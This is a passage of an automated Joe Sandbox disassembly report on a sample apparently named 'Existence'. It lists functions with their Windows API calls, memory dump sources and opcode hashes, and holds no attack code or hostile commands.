                                                                                                                                                                                          • API String ID: 1352324309-0
                                                                                                                                                                                          • Opcode ID: 85c082a0432ccc016235a56e5da685f6871577fff0e46ed8d6aa8bd02fca37b0
                                                                                                                                                                                          • Instruction ID: 335ca9759c37e717ccbd90b2430d8d849735cbb4b13440d7bd817a57d1942d6d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85c082a0432ccc016235a56e5da685f6871577fff0e46ed8d6aa8bd02fca37b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C1161B52157059BEB348F64ED09F927BFCEB00B00F5085ADA616D6150E7B8ED04DB50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BA8B
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BAB0
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BABA
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BAED
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                          • Opcode ID: 7243b9da1fac71de348533b8c71b3e0945ea0412843f9dbce2bc50d4b6d2f091
                                                                                                                                                                                          • Instruction ID: f694cb965eef2cc74ffdc44bb7551af959ddc3c799932aab161644996735c55c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7243b9da1fac71de348533b8c71b3e0945ea0412843f9dbce2bc50d4b6d2f091
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58110971D0062DE7CF10AFE5FA49AEEBB78FF09711F128099D941B2140DB789A50CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007C888E
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007C88A6
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007C88CA
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007C88E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                          • Opcode ID: 42792877daf903bbf4712a743ac7cce98547cb2dcb644e3d6c0b6d1e84745189
                                                                                                                                                                                          • Instruction ID: 7be7bc255160051b6e7bee53b2836f4e96ebc69c6be0539d381b64e24310d06a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42792877daf903bbf4712a743ac7cce98547cb2dcb644e3d6c0b6d1e84745189
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB1140B9D00209AFDB51CFA8C884AEEBBF5FB08310F50816AE915E2650D735AA54CF55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00793712
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00793723
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0079372A
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00793731
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                                          • Opcode ID: 4ea1886eae9cf644cded87161597ab0b4138631707ae738e42dff7e12aeac86a
                                                                                                                                                                                          • Instruction ID: defb2ea59cbf3953d64b475b7902f99284b22bd343a7d99def7812765d444c88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea1886eae9cf644cded87161597ab0b4138631707ae738e42dff7e12aeac86a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E06DB11012247BDA3017E2AC8DEEBBF6CDB42BE1F004029F105E2080DAA88941C2B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00731F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00731F87
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731F96
                                                                                                                                                                                            • Part of subcall function 00731F2D: BeginPath.GDI32(?), ref: 00731FAD
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731FD6
                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007C92E3
                                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 007C92F0
                                                                                                                                                                                          • EndPath.GDI32(?), ref: 007C9300
                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 007C930E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                          • Opcode ID: e20663cf89f9f0bf22f407c3fcd91a5955fd2dc03496c25f06d799ba65daef17
                                                                                                                                                                                          • Instruction ID: b7ae212bdce0fad02eb5541dc562c2e3c3d3f8ad84ac2ec88c550cd950eabe94
                                                                                                                                                                                          • Opcode Fuzzy Hash: e20663cf89f9f0bf22f407c3fcd91a5955fd2dc03496c25f06d799ba65daef17
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F05431006259B7DB225F58AC0EFCE3F59AF09320F048009FA11210E1C7B959519BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 007321BC
                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 007321C6
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007321D9
                                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 007321E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                                          • Opcode ID: 97f630192dffecfdad8345cb607b3e104fbb54de296f30448d4ff6730123410b
                                                                                                                                                                                          • Instruction ID: 6ae94489b74b239e57198f6fe49796a102a0dbd90258b6d102b0eaabc837dbf2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f630192dffecfdad8345cb607b3e104fbb54de296f30448d4ff6730123410b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE06531240244AFDB315B74BC09BE87B11AB11335F08C22DF7B9940E1C7758A51AB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0078EC36
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0078EC40
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0078EC60
                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0078EC81
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                          • Opcode ID: 89343585067bc96802870d3b48de96bc98b5b49390b629ed4c123f39bb1213ad
                                                                                                                                                                                          • Instruction ID: a94507db525b404c4c9520cfdacc29baef42140108c3b4edee98010ce75813a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 89343585067bc96802870d3b48de96bc98b5b49390b629ed4c123f39bb1213ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19E0EEB0800204EFCB60AFA48908E6DBBB1BB08310F10846DE84AE3290CB3C5942EF18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0078EC4A
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0078EC54
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0078EC60
                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0078EC81
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                                          • Opcode ID: 548b378a480650ecfa020bdbc113df23fa54c238288bbc2de94cf8e4ef232e4a
                                                                                                                                                                                          • Instruction ID: 744ab0179bde85aaad07124fc20643178cb6b4934e6fcac45f3737c6391ae78c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 548b378a480650ecfa020bdbc113df23fa54c238288bbc2de94cf8e4ef232e4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: E5E012B0C00204EFCB609FA4C80CA6DBBB1BB08310F10846DF84AE3290CB3C6902DF08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                                          • String ID: @COM_EVENTOBJ$bny
                                                                                                                                                                                          • API String ID: 2948472770-109409036
                                                                                                                                                                                          • Opcode ID: 5b7e8da9b6b009612302cc9112bdcecca5e552364987fe1bc20126783d878876
                                                                                                                                                                                          • Instruction ID: a87913d1e21283bcc6cd0562e5d46da57e44cda7c1ae4b3a044d328005b5520c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b7e8da9b6b009612302cc9112bdcecca5e552364987fe1bc20126783d878876
                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF19D70648300DFDB24EF18C885B6EB7E0BF84B14F14891DF58A9B261D779EA45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007505B2: EnterCriticalSection.KERNEL32(0080170C,?,00000000,?,0073D22A,00803570,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?), ref: 007505BD
                                                                                                                                                                                            • Part of subcall function 007505B2: LeaveCriticalSection.KERNEL32(0080170C,?,0073D22A,00803570,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?,00000001,00802430), ref: 007505FA
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 00750413: __onexit.LIBCMT ref: 00750419
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 007B8658
                                                                                                                                                                                            • Part of subcall function 00750568: EnterCriticalSection.KERNEL32(0080170C,00000000,?,0073D258,00803570,007727C9,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?), ref: 00750572
                                                                                                                                                                                            • Part of subcall function 00750568: LeaveCriticalSection.KERNEL32(0080170C,?,0073D258,00803570,007727C9,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?,00000001), ref: 007505A5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                          • String ID: Variable must be of type 'Object'.$bny
                                                                                                                                                                                          • API String ID: 535116098-1424909381
                                                                                                                                                                                          • Opcode ID: 958231338409138327e7cc76fa468ddeabf5890dad38b172dbbd8dd6ef5e8290
                                                                                                                                                                                          • Instruction ID: 4497cd1c36e7a40de9301bbe7c638f5b38b9e82b528debfa372487b8523f0824
                                                                                                                                                                                          • Opcode Fuzzy Hash: 958231338409138327e7cc76fa468ddeabf5890dad38b172dbbd8dd6ef5e8290
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE917C74A00208EFCB44EF94D895EEDB7B9FF04304F108159F916AB292DB79AE41CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
                                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 007A5919
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                                          • Opcode ID: 131d02307f7b72e8daff763933e44c1810dc13dc63c2c5a9c13299c170c3af48
                                                                                                                                                                                          • Instruction ID: 8ce745a424c4a744234267c8db7806c14bf048051d0dec78c208efbc6d60a767
                                                                                                                                                                                          • Opcode Fuzzy Hash: 131d02307f7b72e8daff763933e44c1810dc13dc63c2c5a9c13299c170c3af48
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B919C75A00604DFDB14CF54C484EAABBF1BF85314F198199E84A9F362CB39EE85CB91
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 0075E67D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                                          • String ID: pow
                                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                                          • Opcode ID: 7aa9cb3c26ae38777ec5de9c06f4e6958ff5713d4b34071b3717004cd90478d8
                                                                                                                                                                                          • Instruction ID: 71a5dcd1a10fa32b37bc91b11082b13216692ed3af3d2e989ad2b7f5ad18ae8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7aa9cb3c26ae38777ec5de9c06f4e6958ff5713d4b34071b3717004cd90478d8
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE517B61E09106C6C75D7714CD053AA2BA4EB11781F308F5DFC92422E9EF7D8E8A9A47
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: #
                                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                                          • Opcode ID: ec4b0422db2e41ed900583c38d8bf99505166f2571d96ff115efbc38d4abcc08
                                                                                                                                                                                          • Instruction ID: bf27fbbc79feb813e9d108e3e97025a7294b1a95aacf0191c4c75ba1989f5628
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec4b0422db2e41ed900583c38d8bf99505166f2571d96ff115efbc38d4abcc08
                                                                                                                                                                                          • Instruction Fuzzy Hash: 50517732684287EFDB24EF28C445AFA7BA0EF15310FA44055F8919B2D1DB3CAD42CB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0074F6DB
                                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0074F6F4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                                          • Opcode ID: 3a7d2154a9947b2ef3c08fdb0e1bbfd70d61a4c0a9a9b4c0336662442e7df7a1
                                                                                                                                                                                          • Instruction ID: efdb95fa3a852329de65cd9dc4ed4fb15c2812925824952f88e64ff20f3f20d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a7d2154a9947b2ef3c08fdb0e1bbfd70d61a4c0a9a9b4c0336662442e7df7a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 785139B1408748DBE360AF10DC8ABABB7E8FB94304F81885DF1D9411A2DB749529CB67
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 007C40BD
                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C40F8
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
